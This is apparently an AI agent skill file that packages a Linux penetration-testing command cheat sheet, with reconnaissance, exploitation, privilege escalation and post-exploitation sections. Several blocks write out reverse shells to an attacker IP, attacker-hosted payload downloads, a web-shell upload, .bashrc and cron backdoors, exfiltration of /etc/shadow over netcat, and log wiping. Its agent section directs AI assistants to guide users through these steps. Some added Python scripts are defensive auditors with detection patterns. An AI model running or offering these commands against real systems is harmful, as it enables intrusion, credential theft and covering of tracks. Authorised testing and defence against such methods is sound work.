---
name: linux-pentester-command-reference
description: Practical Linux command reference and penetration testing notes for reconnaissance, enumeration, exploitation, privilege escalation, and post-exploitation phases
triggers:
  - how do I perform reconnaissance on a Linux system
  - what commands can I use for privilege escalation on Linux
  - show me Linux enumeration commands for pentesting
  - how to find SUID binaries for privilege escalation
  - what are the key Linux commands for post-exploitation
  - help me with Linux penetration testing commands
  - show network reconnaissance commands on Linux
  - how to enumerate services on a Linux target
---
# Linux Pentester Command Reference
Skill by ara.so — Security Skills collection.
This skill provides access to a curated collection of practical Linux commands and techniques organized by penetration testing phases. The repository contains battle-tested commands from real-world labs, CTFs, and hands-on practice, covering reconnaissance, enumeration, exploitation, privilege escalation, and post-exploitation.
## What This Project Provides
Linux for a Pentester is a knowledge repository containing:
- Essential Linux survival commands for daily pentesting
- Local and network reconnaissance techniques
- Service and user data enumeration commands
- Exploitation techniques (shells, file uploads, initial access)
- Privilege escalation methods (SUID, sudo, kernel exploits)
- Post-exploitation activities (persistence, cleanup, lateral movement)
- Quick reference cheatsheets for common scenarios
## Repository Structure

The knowledge base is organized into focused modules:

```text
Linux-for-a-Pentester/
├── 00-General-Commands/      # Daily survival commands
├── 01-Recon/                 # Reconnaissance phase
├── 02-Enumeration/           # Deep service enumeration
├── 03-Exploitation/          # Initial access techniques
├── 04-Privilege-Escalation/  # Root escalation methods
├── 05-Post-Exploitation/     # Persistence & lateral movement
└── Cheatsheets/              # Quick reference one-liners
```
## Installation

Clone the repository locally for quick reference during engagements:

```bash
git clone https://github.com/HIMANSHUSHARMA20/Linux-for-a-Pentester.git
cd Linux-for-a-Pentester
```

For quick access during assessments, bookmark or symlink specific directories:

```bash
# Create a symlink at a quick-access location
ln -s "$(pwd)" ~/pentesting-notes
# Or add the scripts directory to PATH
export PATH="$PATH:$(pwd)/scripts"
```
## Key Command Categories

### General Commands (Phase 0)

Essential survival commands for system navigation and basic operations:

```bash
# System information gathering
uname -a                # Kernel version and system info
cat /etc/os-release     # Distribution details
hostname                # Current hostname
whoami                  # Current user
id                      # User ID and group membership
w                       # Logged in users
last                    # Login history

# File operations
find / -name "flag.txt" 2>/dev/null       # Find files by name
find / -perm -4000 -type f 2>/dev/null    # Find SUID binaries
find / -writable -type d 2>/dev/null      # Find writable directories
grep -r "password" /home 2>/dev/null      # Search for strings

# Network basics
ip a                    # Network interfaces
ss -tulpn               # Listening ports and the processes that own them
netstat -tulpn          # Alternative connection viewer (netstat -ano is the Windows form)
cat /etc/hosts          # Hosts file
cat /etc/resolv.conf    # DNS configuration
```
### Reconnaissance (Phase 1)

Local and network discovery commands:

```bash
# Local enumeration
ps aux                  # Running processes
ps aux | grep root      # Root processes
cat /etc/passwd         # User accounts
cat /etc/group          # Group information
cat /etc/shadow         # Password hashes (if accessible)
env                     # Environment variables
history                 # Command history
cat ~/.bash_history     # User bash history

# Network reconnaissance
ping -c 4 <target>      # Host availability
for i in {1..254}; do ping -c 1 192.168.1.$i | grep "64 bytes"; done   # Ping sweep
nmap -sV -p- <target>   # Service version scan
nmap -sU -p- <target>   # UDP scan
arp -a                  # ARP cache
route -n                # Routing table

# Service identification
curl -I http://<target>     # HTTP headers
nc -v <target> <port>       # Manual banner grabbing
telnet <target> <port>      # Alternative banner grab
```
### Enumeration (Phase 2)

Deep-dive service and data enumeration:

```bash
# User enumeration
cut -d: -f1 /etc/passwd                                          # List all users
grep -v -E "^#" /etc/passwd | awk -F: '$3 < 1000 {print $1}'     # System users
getent passwd <username>                                         # User details
groups <username>                                                # User groups

# File system enumeration
find / -user root -perm -4000 2>/dev/null    # SUID root files
find / -type f -perm -o+w 2>/dev/null        # World-writable files
find / -name "*.conf" 2>/dev/null            # Configuration files
find / -name "id_rsa" 2>/dev/null            # SSH private keys
locate password | more                       # Files with 'password' in the name

# Service enumeration
systemctl list-units --type=service    # Running services
cat /etc/services                      # Port to service mapping
ls -la /etc/cron*                      # Cron jobs
cat /etc/crontab                       # System crontab
crontab -l                             # User crontab

# Database files
find / -name "*.db" 2>/dev/null
find / -name "*.sqlite" 2>/dev/null
```
### Exploitation (Phase 3)

Initial access and shell techniques:

```bash
# Reverse shells
bash -i >& /dev/tcp/<attacker-ip>/<port> 0>&1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
nc -e /bin/bash <attacker-ip> <port>
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> <port> >/tmp/f

# Shell stabilization
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# Press Ctrl+Z
stty raw -echo; fg
# Press Enter twice

# File upload techniques
wget http://<attacker-ip>/shell.sh -O /tmp/shell.sh
curl http://<attacker-ip>/shell.sh -o /tmp/shell.sh
scp user@<attacker-ip>:/path/to/file /tmp/
nc -lvp <port> < file.txt    # Sender (listener serves the file)
nc <ip> <port> > file.txt    # Receiver (connects and saves it)
```
### Privilege Escalation (Phase 4)

Techniques to escalate to root:

```bash
# SUID exploitation
find / -perm -4000 -type f 2>/dev/null    # Find SUID binaries
ls -la /usr/bin/find                      # Check specific binary
# Example: find SUID exploitation
find . -exec /bin/sh -p \; -quit

# Sudo abuse
sudo -l                     # List sudo permissions
sudo -u#-1 /bin/bash        # CVE-2019-14287 (sudo < 1.8.28)
# Check GTFOBins for specific binaries

# Kernel exploits
uname -a                            # Kernel version
cat /proc/version                   # Detailed version
searchsploit kernel $(uname -r)     # Search exploits
gcc -o exploit exploit.c            # Compile exploit
./exploit                           # Execute

# Writable /etc/passwd
openssl passwd -1 -salt xyz password123    # Generate hash
echo 'newroot:$1$xyz$...:0:0:root:/root:/bin/bash' >> /etc/passwd

# Cron job abuse
cat /etc/crontab        # Check cron jobs
ls -la /etc/cron.*      # Cron directories
# Create reverse shell in writable cron script
echo 'bash -i >& /dev/tcp/<ip>/<port> 0>&1' >> /path/to/cron/script.sh

# Capabilities
getcap -r / 2>/dev/null    # Find capabilities
# Example: python with cap_setuid
python -c 'import os; os.setuid(0); os.system("/bin/bash")'

# PATH hijacking
echo $PATH                  # Current PATH
export PATH=/tmp:$PATH      # Prepend /tmp
# Create malicious binary in /tmp with same name as legitimate one
```
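The SUID, writable /etc/passwd and cron checks above are the same checks a hardening audit runs from the defender's side. The script below is an added example written for this page, not code from the Linux-for-a-Pentester repository: it walks the filesystem for SUID files the way `find / -perm -4000 -type f` does, compares them against an allowlist, flags extra UID-0 accounts or hashes stored directly in `/etc/passwd`, and reports crontab scripts that any local user can overwrite. The allowlist, the passwd and crontab samples, the fake stat results and all function names are constructed for the example.

```python
from __future__ import annotations

import os
import stat
from typing import Callable, Iterable, Optional

# Expected SUID binaries on a typical Debian/Ubuntu host (constructed allowlist;
# build the real one from a known-good image of the distribution you audit).
EXPECTED_SUID = {
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/newgrp",
    "/usr/bin/gpasswd", "/usr/lib/openssh/ssh-keysign",
}

def find_suid(root: str = "/") -> list[str]:
    """Walk the tree like `find / -perm -4000 -type f 2>/dev/null`."""
    hits = []
    for dirpath, _dirs, files in os.walk(root, onerror=lambda _e: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return hits

def unexpected_suid(suid_paths: Iterable[str], baseline=EXPECTED_SUID) -> list[str]:
    """SUID files not on the allowlist; a SUID find, vim or bash shows up here."""
    return sorted(p for p in suid_paths if p not in baseline)

def suspicious_passwd_entries(passwd_text: str) -> list[tuple[str, str]]:
    """Rows that look like the writable-/etc/passwd technique: an extra UID-0
    account, or a hash placed directly in the password field."""
    findings = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if not line.strip() or line.startswith("#") or len(fields) < 7:
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and user != "root":
            findings.append((user, "uid 0 but not root"))
        if pw not in ("x", "*", "!", "!!", ""):
            findings.append((user, "password hash stored in passwd"))
    return findings

def real_mode(path: str) -> Optional[int]:
    try:
        return os.stat(path).st_mode
    except OSError:
        return None

def writable_cron_scripts(crontab_text: str,
                          mode_of: Callable[[str], Optional[int]] = real_mode) -> list[str]:
    """Scripts run from a system crontab that any local user can edit."""
    findings = set()
    for line in crontab_text.splitlines():
        tokens = line.split()
        if not tokens or tokens[0].startswith("#") or "=" in tokens[0]:
            continue  # blank, comment, or VAR=value line
        # system crontab: five time fields (or one @special) + user + command
        command = tokens[2:] if tokens[0].startswith("@") else tokens[6:]
        for tok in command:
            mode = mode_of(tok) if tok.startswith("/") else None
            if mode is not None and stat.S_ISREG(mode) and mode & stat.S_IWOTH:
                findings.add(tok)
    return sorted(findings)

# Constructed sample inputs, not taken from a real host.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000:alice:/home/alice:/bin/bash
newroot:$1$xyz$PLACEHOLDERHASH:0:0:root:/root:/bin/bash
"""
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/5 * * * * root /opt/backup/backup.sh
@reboot root /usr/local/bin/healthcheck.sh
"""
# Fake stat results standing in for the filesystem during the sample run.
SAMPLE_MODES = {
    "/": 0o040755,
    "/opt/backup/backup.sh": 0o100777,  # world-writable and run as root
    "/usr/local/bin/healthcheck.sh": 0o100755,
}
SAMPLE_SUID = sorted(EXPECTED_SUID) + ["/usr/bin/find"]

def audit_samples() -> dict:
    return {
        "unexpected_suid": unexpected_suid(SAMPLE_SUID),
        "passwd": suspicious_passwd_entries(SAMPLE_PASSWD),
        "cron": writable_cron_scripts(SAMPLE_CRONTAB, SAMPLE_MODES.get),
    }

if __name__ == "__main__":
    for check, result in audit_samples().items():
        print(f"{check}: {result}")
    # Live host instead: print(unexpected_suid(find_suid("/")))
```

Run it as-is to see the three findings on the constructed samples; swap `SAMPLE_MODES.get` for the default `real_mode` and feed it the real `/etc/crontab` to audit a host. Group-writable scripts and writable parent directories are deliberately out of scope here and would be the next checks to add.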
### Post-Exploitation (Phase 5)

Maintaining access and lateral movement:

```bash
# Persistence
echo 'bash -i >& /dev/tcp/<ip>/<port> 0>&1' >> ~/.bashrc
(crontab -l ; echo "@reboot /tmp/backdoor.sh") | crontab -
ssh-keygen -t rsa                                  # Generate SSH key
cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys

# Data exfiltration
tar czf - /path/to/data | nc <attacker-ip> <port>  # Sender
nc -lvp <port> | tar xzf - > /dev/null             # Receiver
base64 -w0 /etc/shadow > shadow.b64                # Encode for transfer (on target)
base64 -d shadow.b64 > shadow.txt                  # Decode after transfer (on attacker machine)

# Cleanup
history -c                      # Clear command history
rm ~/.bash_history              # Remove history file
echo "" > /var/log/auth.log     # Clear logs (requires root)
unset HISTFILE                  # Disable history logging

# Lateral movement
ssh user@<target-host>                                          # SSH to other hosts
for i in {1..254}; do ssh user@192.168.1.$i 2>/dev/null; done   # Try each host in turn
scp file.txt user@<host>:/tmp/                                  # Copy files to other hosts
```
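The persistence and cleanup commands above leave recognisable traces in shell rc files, crontabs and `authorized_keys`, which is what a responder looks for. The following Python script is an added example for this page, not code from the repository: it scans constructed copies of those files for the indicators the commands leave behind and lists SSH keys that are not on an approved set. Indicator names, sample file contents and the approved-key set are all assumptions made for the example.

```python
from __future__ import annotations

import re

# Indicator patterns for the persistence and anti-forensics commands in this
# section (constructed for this example; extend from your own incident data).
INDICATORS = [
    ("reverse shell via /dev/tcp", re.compile(r"/dev/tcp/")),
    ("netcat exec shell", re.compile(r"\bnc\b.*\s-e\s")),
    ("fifo-based shell", re.compile(r"\bmkfifo\b.*\|\s*nc\b")),
    ("cron @reboot entry", re.compile(r"^\s*@reboot\b")),
    ("history disabled", re.compile(r"\bunset\s+HISTFILE\b|HISTSIZE=0\b|HISTFILESIZE=0\b|\bhistory\s+-c\b")),
]

def scan_text(name: str, text: str) -> list[tuple[str, int, str]]:
    """Return (file, line number, indicator) for every line matching a pattern."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for label, pattern in INDICATORS:
            if pattern.search(line):
                hits.append((name, lineno, label))
    return hits

def scan_files(files: dict[str, str]) -> list[tuple[str, int, str]]:
    """Scan several (name, contents) pairs and concatenate the findings."""
    hits = []
    for name, text in files.items():
        hits.extend(scan_text(name, text))
    return hits

def unapproved_keys(authorized_keys_text: str, approved: set[str]) -> list[str]:
    """Key material in authorized_keys that is not in the approved set: the
    defender-side check for the ssh-keygen persistence step."""
    unknown = []
    for line in authorized_keys_text.splitlines():
        parts = line.split()
        if len(parts) < 2 or line.startswith("#"):
            continue
        # line shape: [options] keytype base64 [comment]; locate the keytype token
        for i, part in enumerate(parts[:-1]):
            if part.startswith(("ssh-", "ecdsa-", "sk-")):
                if parts[i + 1] not in approved:
                    unknown.append(parts[i + 1])
                break
    return unknown

# Constructed sample files (203.0.113.0/24 is a documentation range; keys are fake).
SAMPLE_BASHRC = """\
# ~/.bashrc: executed by bash(1) for non-login shells.
case $- in *i*) ;; *) return;; esac
HISTSIZE=1000
alias ll='ls -alF'
bash -i >& /dev/tcp/203.0.113.10/4444 0>&1
unset HISTFILE
"""
SAMPLE_CRONTAB = """\
@reboot /tmp/backdoor.sh
0 2 * * * /usr/local/bin/rotate-logs.sh
"""
APPROVED_KEY = "AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEAPPROVEDKEY000000000000000000"
UNKNOWN_KEY = "AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEUNKNOWNKEY0000000000000000000"
SAMPLE_AUTH_KEYS = f"""\
ssh-ed25519 {APPROVED_KEY} alice@laptop
# entry below appeared after the incident window
ssh-ed25519 {UNKNOWN_KEY} root@target
"""

def sample_findings() -> list[tuple[str, int, str]]:
    return scan_files({"~/.bashrc": SAMPLE_BASHRC, "crontab": SAMPLE_CRONTAB})

if __name__ == "__main__":
    for finding in sample_findings():
        print("%s:%d %s" % finding)
    print("unapproved keys:", unapproved_keys(SAMPLE_AUTH_KEYS, {APPROVED_KEY}))
```

On a live host the same functions take the contents of each user's rc files, `crontab -l` output for each user, and every `authorized_keys` file; an emptied `/var/log/auth.log` is best caught by file-size or inode monitoring rather than content matching, so it is not covered here.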
## Common Patterns and Workflows

### Initial Access Workflow

```bash
# 1. Reconnaissance
nmap -sV -sC -p- <target-ip> -oN nmap.txt
grep open nmap.txt

# 2. Service enumeration
whatweb http://<target-ip>
nikto -h http://<target-ip>

# 3. Exploitation (example: web shell upload)
curl -X POST -F "file=@shell.php" http://<target-ip>/upload.php
curl http://<target-ip>/uploads/shell.php?cmd=whoami

# 4. Reverse shell
# On attacker machine:
nc -lvnp 4444
# On target via web shell:
bash -c 'bash -i >& /dev/tcp/<attacker-ip>/4444 0>&1'
```
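Step 1 of the workflow greps `nmap.txt` for open ports. As an added example (not code from the repository), here is a small parser for `nmap -oN` output that returns the open ports as structured records and diffs two scans, which turns the same file into the change report a defender wants from a scheduled scan. The sample scan text, host name and version strings are constructed.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# The two line shapes that matter in `nmap -oN` ("normal") output.
HOST_LINE = re.compile(r"^Nmap scan report for (\S+)(?: \(([\d.]+)\))?")
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

@dataclass(frozen=True)
class PortRecord:
    host: str
    port: int
    proto: str
    state: str
    service: str
    version: str

def parse_nmap_normal(text: str) -> list[PortRecord]:
    """Turn -oN output into records. A 'Nmap scan report for' header sets the
    host for the port lines below it, so multi-host scans parse correctly."""
    host = None
    records = []
    for raw in text.splitlines():
        line = raw.strip()
        m = HOST_LINE.match(line)
        if m:
            host = m.group(2) or m.group(1)  # prefer the IP when both are shown
            continue
        m = PORT_LINE.match(line)
        if m and host is not None:
            port, proto, state, service, version = m.groups()
            records.append(PortRecord(host, int(port), proto, state, service, version.strip()))
    return records

def open_ports(records: list[PortRecord]) -> list[PortRecord]:
    """What `grep open nmap.txt` shows, as data ('open|filtered' counts as open)."""
    return [r for r in records if r.state.startswith("open")]

def new_exposures(baseline: list[PortRecord],
                  current: list[PortRecord]) -> list[tuple[str, int, str]]:
    """(host, port, proto) open in the current scan but absent from the baseline."""
    before = {(r.host, r.port, r.proto) for r in open_ports(baseline)}
    return sorted((r.host, r.port, r.proto) for r in open_ports(current)
                  if (r.host, r.port, r.proto) not in before)

# Constructed sample output (not a real scan); version strings are illustrative.
BASELINE_SCAN = """\
# Nmap 7.94 scan initiated Mon Jan  1 00:00:00 2024 as: nmap -sV -sC -p- -oN nmap.txt 10.0.0.5
Nmap scan report for target.lab (10.0.0.5)
Host is up (0.0010s latency).
Not shown: 65533 closed tcp ports (reset)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.52 ((Ubuntu))
"""
CURRENT_SCAN = """\
Nmap scan report for target.lab (10.0.0.5)
Host is up (0.0012s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
80/tcp   open     http    Apache httpd 2.4.52 ((Ubuntu))
443/tcp  filtered https
3306/tcp open     mysql   MySQL 8.0.36-0ubuntu0.22.04.1
"""

def sample_report() -> list[tuple[str, int, str]]:
    return new_exposures(parse_nmap_normal(BASELINE_SCAN), parse_nmap_normal(CURRENT_SCAN))

if __name__ == "__main__":
    for rec in open_ports(parse_nmap_normal(CURRENT_SCAN)):
        print(f"{rec.host}:{rec.port}/{rec.proto} {rec.service} {rec.version}")
    print("newly exposed:", sample_report())
```

Point `parse_nmap_normal` at the contents of a real `nmap.txt` written with `-oN`; the grep step in the workflow and this parser read the same file, the difference is that the parser keeps host, state and version together and can compare runs.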
### Privilege Escalation Workflow

```bash
# 1. System information gathering
uname -a
cat /etc/issue
cat /etc/*-release

# 2. Automated enumeration (if possible to upload)
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

# 3. Manual checks
sudo -l
find / -perm -4000 2>/dev/null
getcap -r / 2>/dev/null
cat /etc/crontab

# 4. Exploit and escalate
# Execute the appropriate technique based on findings
```
## Troubleshooting

### Command Not Found

```bash
# Check if binary exists
which <command>
find / -name <command> 2>/dev/null

# Use alternatives
# nc not available → use bash /dev/tcp
# python not available → use python3 or perl
# sudo -l fails → check SUID binaries
```

### Shell Issues

```bash
# If shell is not interactive:
python -c 'import pty;pty.spawn("/bin/bash")'
script /dev/null -c bash

# If terminal size is wrong:
stty rows 38 columns 116
export TERM=xterm-256color
```

### Permission Denied

```bash
# Try with the full path, e.g. /usr/bin/command instead of command
# Check file permissions
ls -la /path/to/file
# Look for writable directories
find / -writable -type d 2>/dev/null
```

### Network Connection Failures

```bash
# Check firewall rules
iptables -L
cat /etc/iptables/rules.v4

# Try different ports
# 443, 80, 53 are often allowed outbound

# Use different protocols
# If TCP fails, try UDP
# If direct connection fails, try DNS tunneling
```
## Integration with AI Agents
When assisting users with this project:
- Identify the pentesting phase the user is in (recon, enum, exploit, privesc, post-exploit)
- Reference the appropriate directory in the repository structure
- Provide relevant commands with explanations of flags and options
- Suggest variations based on the target environment (Linux distro, available tools)
- Warn about operational security implications when appropriate
- Recommend cleanup steps after exploitation activities
## Best Practices
- Always get proper authorization before performing penetration testing
- Document all commands and findings during assessments
- Use these notes as a reference, but adapt to specific target environments
- Test commands in controlled lab environments before production use
- Clean up artifacts and close backdoors after authorized testing
- Keep sensitive values such as the attacker IP, target IP and remote port in environment variables (`$ATTACKER_IP`, `$TARGET_IP`, `$RPORT`) rather than hard-coding them into commands
## Additional Resources
For deeper dives into specific techniques, consult:
- GTFOBins (https://gtfobins.github.io/) for SUID/sudo abuse
- HackTricks (https://book.hacktricks.xyz/) for comprehensive techniques
- PayloadsAllTheThings (https://github.com/swisskyrepo/PayloadsAllTheThings)
- PEASS-ng (https://github.com/carlospolop/PEASS-ng) for automated enumeration
This skill enables AI agents to guide users through Linux penetration testing phases with practical, field-tested commands and techniques.